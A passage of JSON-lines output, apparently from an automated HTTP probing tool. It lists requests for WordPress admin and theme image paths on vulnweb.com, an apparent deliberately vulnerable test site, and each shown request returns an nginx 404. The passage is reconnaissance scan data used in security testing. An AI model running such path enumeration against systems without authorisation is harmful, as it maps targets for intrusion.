Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/comment-grey-bubble.png\",\"time\":\"338.865868ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.838590494Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/arrows.png\",\"input\":\"http://vulnweb.com/wp-admin/images/arrows.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/arrows.png\",\"time\":\"346.332076ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.839800518Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/bubble_bg-2x.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/bubble_bg-2x.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/bubble_bg-2x.gif\",\"time\":\"346.575164ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.840251319Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/bubble_bg.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/bubble_bg.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/bubble_bg.gif\",\"time\":\"347.062582ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.845914051Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/icons32.png?ver=20121105\",\"input\":\"http://vulnweb.com/wp-admin/images/icons32.png?ver=20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/icons32.png?ver=20121105\",\"time\":\"342.491317ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.847833336Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/imgedit-icons-2x.png\",\"input\":\"http://vulnweb.com/wp-admin/images/imgedit-icons-2x.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/imgedit-icons-2x.png\",\"time\":\"343.546128ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.849512793Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/icons32-2x.png?ver=20121105\",\"input\":\"http://vulnweb.com/wp-admin/images/icons32-2x.png?ver=20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/icons32-2x.png?ver=20121105\",\"time\":\"346.374299ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.849629341Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/date-button.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/date-button.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/date-button.gif\",\"time\":\"352.259367ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.849947358Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/comment-grey-bubble-2x.png\",\"input\":\"http://vulnweb.com/wp-admin/images/comment-grey-bubble-2x.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/comment-grey-bubble-2x.png\",\"time\":\"355.925224ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.851647013Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/imgedit-icons.png\",\"input\":\"http://vulnweb.com/wp-admin/images/imgedit-icons.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/imgedit-icons.png\",\"time\":\"344.775908ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.855274398Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/date-button-2x.gif?ver=20120916\",\"input\":\"http://vulnweb.com/wp-admin/images/date-button-2x.gif?ver=20120916\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/date-button-2x.gif?ver=20120916\",\"time\":\"356.862736ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.874224231Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/list.png\",\"input\":\"http://vulnweb.com/wp-admin/images/list.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/list.png\",\"time\":\"342.543754ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:22.880034091Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/list-2x.png?ver=20120916\",\"input\":\"http://vulnweb.com/wp-admin/images/list-2x.png?ver=20120916\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/list-2x.png?ver=20120916\",\"time\":\"351.049077ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.97669081Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/menu.png?ver=20121105\",\"input\":\"http://vulnweb.com/wp-admin/images/menu.png?ver=20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/menu.png?ver=20121105\",\"time\":\"339.011501ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.976703059Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/menu-shadow-rtl.png\",\"input\":\"http://vulnweb.com/wp-admin/images/menu-shadow-rtl.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/menu-shadow-rtl.png\",\"time\":\"340.409925ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.980363605Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/press-this-2x.png?v=20121105\",\"input\":\"http://vulnweb.com/wp-admin/images/press-this-2x.png?v=20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/press-this-2x.png?v=20121105\",\"time\":\"338.779082ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.980386818Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/press-this.png?v=20120502\",\"input\":\"http://vulnweb.com/wp-admin/images/press-this.png?v=20120502\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/press-this.png?v=20120502\",\"time\":\"338.780887ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.98687953Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/menu-shadow.png\",\"input\":\"http://vulnweb.com/wp-admin/images/menu-shadow.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/menu-shadow.png\",\"time\":\"348.203646ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.988535219Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/loading.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/loading.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/loading.gif\",\"time\":\"356.189008ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.991988674Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/sort.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/sort.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/sort.gif\",\"time\":\"342.448016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.992468737Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/menu-2x.png?ver=20121105\",\"input\":\"http://vulnweb.com/wp-admin/images/menu-2x.png?ver=20121105\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/menu-2x.png?ver=20121105\",\"time\":\"357.305275ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:30.998872491Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/resize-2x.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/resize-2x.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/resize-2x.gif\",\"time\":\"354.540652ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.000847693Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/welcome-icons-2x.png\",\"input\":\"http://vulnweb.com/wp-admin/images/welcome-icons-2x.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/welcome-icons-2x.png\",\"time\":\"343.961778ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.001659894Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/stars-2x.png?ver=20121108\",\"input\":\"http://vulnweb.com/wp-admin/images/stars-2x.png?ver=20121108\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/stars-2x.png?ver=20121108\",\"time\":\"351.750324ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.002504629Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/welcome-icons.png\",\"input\":\"http://vulnweb.com/wp-admin/images/welcome-icons.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/welcome-icons.png\",\"time\":\"339.584907ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.003929443Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/stars.png?ver=20121108\",\"input\":\"http://vulnweb.com/wp-admin/images/stars.png?ver=20121108\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/stars.png?ver=20121108\",\"time\":\"348.000893ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.004643235Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/sort-2x.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/sort-2x.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/sort-2x.gif\",\"time\":\"355.013534ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.005722796Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/resize.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/resize.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/resize.gif\",\"time\":\"360.573927ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:31.020806333Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wordpress-logo-2x.png?ver=20120412\",\"input\":\"http://vulnweb.com/wp-admin/images/wordpress-logo-2x.png?ver=20120412\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wordpress-logo-2x.png?ver=20120412\",\"time\":\"355.870463ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.178795037Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wp-badge.png?ver=20111120\",\"input\":\"http://vulnweb.com/wp-admin/images/wp-badge.png?ver=20111120\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wp-badge.png?ver=20111120\",\"time\":\"338.327345ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.183261305Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wordpress-logo.png?ver=20120216\",\"input\":\"http://vulnweb.com/wp-admin/images/wordpress-logo.png?ver=20120216\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wordpress-logo.png?ver=20120216\",\"time\":\"346.00405ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.185467501Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wp-logo.png?ver=20110504\",\"input\":\"http://vulnweb.com/wp-admin/images/wp-logo.png?ver=20110504\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wp-logo.png?ver=20110504\",\"time\":\"343.991055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.192066191Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/xit-2x.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/xit-2x.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/xit-2x.gif\",\"time\":\"338.983994ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.192966715Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wp-badge-2x.png?ver=20120516\",\"input\":\"http://vulnweb.com/wp-admin/images/wp-badge-2x.png?ver=20120516\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wp-badge-2x.png?ver=20120516\",\"time\":\"351.723632ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.19674831Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/xit-2x.gif?ver=20120916\",\"input\":\"http://vulnweb.com/wp-admin/images/xit-2x.gif?ver=20120916\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/xit-2x.gif?ver=20120916\",\"time\":\"344.739102ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.196859026Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wp-logo-2x.png?ver=20120916\",\"input\":\"http://vulnweb.com/wp-admin/images/wp-logo-2x.png?ver=20120916\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wp-logo-2x.png?ver=20120916\",\"time\":\"355.753562ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.199354354Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wpspin_light.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/wpspin_light.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/wpspin_light.gif\",\"time\":\"349.766818ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.2008504Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-content/plugins/wsdplugin/css/styles-extra.css\",\"input\":\"http://vulnweb.com/wp-content/plugins/wsdplugin/css/styles-extra.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-content/plugins/wsdplugin/css/styles-extra.css\",\"time\":\"344.434424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.203674005Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/xit.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/xit.gif\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin/images/xit.gif\",\"time\":\"352.018285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.203848041Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-content/themes/twentyeleven/images/comment-arrow-bypostauthor.png\",\"input\":\"http://vulnweb.com/wp-content/themes/twentyeleven/images/comment-arrow-bypostauthor.png\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-content/themes/twentyeleven/images/comment-arrow-bypostauthor.png\",\"time\":\"346.174697ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:33.206105772Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/wp-admin/images/wpspin_light-2x.gif\",\"input\":\"http://vulnweb.com/wp-admin/images/wpspin_light-2x.gif\",\"title\":\"404 Not 